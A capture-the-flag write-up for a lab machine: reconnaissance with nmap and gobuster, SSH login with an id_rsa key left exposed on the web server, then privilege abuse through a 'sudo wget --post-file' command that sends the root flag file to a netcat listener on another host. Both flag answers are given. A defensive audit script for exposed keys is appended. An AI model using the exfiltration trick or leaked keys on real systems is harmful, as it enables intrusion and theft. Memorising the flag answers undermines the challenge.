Can you exfiltrate the root flag?
Scan ports using nmap
nmap -A -T4 10.10.200.215
We found 2 open ports: 22 (ssh) and 80 (http).
We access the web service over HTTP on port 80.
Viewing the page source, we can see an announcement on line 278.
"jessie" is the name of one user on the server.
We use gobuster to enumerate directories on the web server.
gobuster dir -u http://10.10.200.215/ -w /usr/share/wordlists/dirb/common.txt -t 30
We access the /sitemap/ directory and find a corporate website.
We run gobuster against this page.
gobuster dir -u http://10.10.200.215/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 30
We found a ".ssh" directory containing an id_rsa file.
We can ssh in as the "jessie" user using the id_rsa file.
wget http://10.10.200.215/sitemap/.ssh/id_rsa
chmod 600 id_rsa
ssh jessie@10.10.200.215 -i id_rsa
find . -name '*flag*'
Flag | User flag |
---|---|
Answer | 057c67131c3d5e42dd5cd3075b198ff6 |
sudo -l -l
Only /usr/bin/wget is allowed to run via sudo.
We start a netcat listener and use wget's "--post-file" option to get the root flag.
nc -lvnp 4444
# another terminal
sudo /usr/bin/wget --post-file=/root/root_flag.txt 10.10.149.210:4444
And just like that, I got the root_flag.txt
Flag | Root flag |
---|---|
Answer | b1b968b37519ad1daa6408188649263d |
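A defender-side check for the misconfiguration that gave the foothold above (a private key served from /sitemap/.ssh/): this is an added example, not part of the original write-up, that audits a web document root for hidden directories and private key files. The function names and the sample tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a web document root for
# content a directory brute-force would find, such as the .ssh/id_rsa above.

# PEM/OpenSSH private key header, e.g. "-----BEGIN RSA PRIVATE KEY-----".
KEY_RE='-----BEGIN ([A-Z0-9]+ )*PRIVATE KEY-----'

# audit_webroot DIR: print "<reason><TAB><path>" per finding; return 1 if any.
audit_webroot() {
    root=$1
    findings=$(
        # Hidden directories (.ssh, .git, ...) below the document root.
        find "$root" -type d -name '.*' ! -path "$root" 2>/dev/null |
            awk '{ print "hidden-dir\t" $0 }'
        # Files carrying a private key header, whatever they are named.
        find "$root" -type f -exec grep -lE -e "$KEY_RE" {} + 2>/dev/null |
            awk '{ print "private-key\t" $0 }'
    )
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

# make_sample_root: build a constructed tree mirroring the layout in this
# write-up (sitemap/.ssh/id_rsa) plus a renamed key copy; prints its path.
make_sample_root() {
    d=$(mktemp -d) || return 1
    mkdir -p "$d/sitemap/.ssh" "$d/sitemap/images"
    printf '<html>ok</html>\n' > "$d/index.html"
    # Constructed placeholder, not real key material.
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'CONSTRUCTED' \
        '-----END RSA PRIVATE KEY-----' > "$d/sitemap/.ssh/id_rsa"
    cp "$d/sitemap/.ssh/id_rsa" "$d/sitemap/images/backup.txt"
    printf '%s\n' "$d"
}

# Demo run on the constructed tree.
sample=$(make_sample_root)
audit_webroot "$sample" || echo "findings above: remove them from the docroot"
rm -rf "$sample"
```

The content scan also catches the key when it has been copied under another name, which a filename-only check for id_rsa would miss.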